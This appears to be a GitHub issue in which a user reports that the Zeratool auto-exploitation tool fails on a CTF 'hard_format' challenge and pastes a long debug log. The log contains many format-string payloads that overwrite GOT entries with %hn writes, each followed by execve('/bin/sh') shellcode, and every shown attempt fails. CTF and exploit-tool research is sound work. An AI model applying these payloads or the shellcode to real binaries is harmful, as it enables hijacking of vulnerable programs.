
Issue about "hard_format" binary exploitation

Open kxdkxd opened this issue 3 years ago • 0 comments

I have tried the brand new pull request on the original repo; it works fine for me!

But I still have some trouble when exploiting the "hard_format" binary, while the others can be exploited successfully. Although I have run this script dozens of times, it didn't work.

The log is pretty long:

(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x




[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x



t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack

kxdkxd, Apr 15 '21 12:04